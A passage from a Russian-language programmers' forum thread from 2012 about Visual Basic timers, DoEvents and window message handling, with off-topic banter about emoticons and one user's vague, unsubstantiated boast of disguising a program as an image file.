Shocker.ProAntonariyНе совсем так. Это означает обработать сообщения оконной процедуры, то есть накопившиеся клики, тычки в клавиатуру и т.п. в активном окне программы (а так же таймеры, ведь это событие окна WM_TIMER) пока оно висело во время выполнения пользовательской процедуры.ну для программиста ведь это выглядит именно так, как я описалхотя... если во втором событии при возникновении DoEvents управление не вернется в конце-концов к первому DoEvents, пока не закончится вторая процедура, то я не прав. Никогда не экспериментировал с этим. И еще. События ADODB или, скажем того же MSXML не оконные. Что, они не отработают через DoEvents? Или они тоже оконные? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:15 |
|
таймер
|
|||
---|---|---|---|
#18+
мудрённо с реферансами( а с таймерами надо делить одну процедуру на двадцать и вставлять кучу таймеров. попробую оставить в процедуре обращения к серверу Код: vbnet 1. 2. 3.
если остальные процедуры и таймеры будут рабоатть в это время... они ведь будут работать? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:52 |
|
таймер
|
|||
---|---|---|---|
#18+
Будут работать только те процедуры, которые были вызваны другими событиями. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:57 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProБудут работать только те процедуры, которые были вызваны другими событиями. это как? 2 таймера. в одном циклится DoEvents. он, понятное дело, пока условие не наступит, не заработает дальше. а второй таймер в это время будет работать? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:59 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Pro, спс, убрал все синхронные запросы, поставил кучу DoEventsов. буду тестить. КСТАТИ!!! ща один хакер научил меня маскировать прогу под картинку(и вообще под любой другой файл)... это просто пздц. я считал, что это невозможно. вывод: больше не принимаю ни от кого не только проги, но и всё остальное)) ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:49 |
|
таймер
|
|||
---|---|---|---|
#18+
QlewerКСТАТИ!!! ща один хакер научил меня маскировать прогу под картинку(и вообще под любой другой файл)... это просто пздц. я считал, что это невозможно. вывод: больше не принимаю ни от кого не только проги, но и всё остальное))децкий сад... хакеров. - А у меня вот какой фломастер есть! - А у меня мячик футбольный... Тьфу!. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:53 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, > но и всё остальное) токо хотел 20ку прислать... облом ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:54 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, > но и всё остальное) токо хотел 20ку прислать... облом XDDD приколист) ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:55 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, всё забываю спросить, что такое XDDD? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:56 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProИ еще. События ADODB или, скажем того же MSXML не оконные. Что, они не отработают через DoEvents? Или они тоже оконные?В MSDN написано конкретно window messages, так что по логике выходит как бы непрерывное исполнение цепочки пользовательская процедура->оконная процедура (DoEvents это все равно что вызов Call WndProc(hwnd, msg, wparam, lparam))->пользовательская процедура. Так что очередь до ADODB дойдет когда эта цепочка закончится. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 20:58 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, всё забываю спросить, что такое XDDD?Это смайлик. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 21:00 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, всё забываю спросить, что такое XDDD? ) :) :D XD XDDD некоторые пишут смайл по-русски, т.е. ХДДД, т.к. считают, что это какая-то аббревиатура. это ужаснейшее нарушение правил задротского языка, с такими настоящие про не общаются ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 21:02 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, Ворд знает только это :), остальному надо научить :) :) :) :) :) :) ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 21:06 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, всё забываю спросить, что такое XDDD?это 1490, записанное римскими цифрами ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 21:08 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProкатастрофаQlewer, всё забываю спросить, что такое XDDD? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 21:12 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer+ Shocker.Proпропущено... это 1490, записанное римскими цифрами погугли значение слова "осуществляться" ... |
|||
:
Нравится:
Не нравится:
|
|||
18.06.2012, 10:43 |
|
таймер
|
|||
---|---|---|---|
#18+
QValDпогугли значение слова "осуществляться" ... |
|||
:
Нравится:
Не нравится:
|
|||
18.06.2012, 13:29 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerу мя 98 балов ЕГЭ по русскому ... |
|||
:
Нравится:
Не нравится:
|
|||
18.06.2012, 13:32 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerтеперь через прогу можно отправлять и запускать файлы на удалённом компьютере в инвизе) Мечтать не вредно! ... |
|||
:
Нравится:
Не нравится:
|
|||
18.06.2012, 13:36 |
|
таймер
|
|||
---|---|---|---|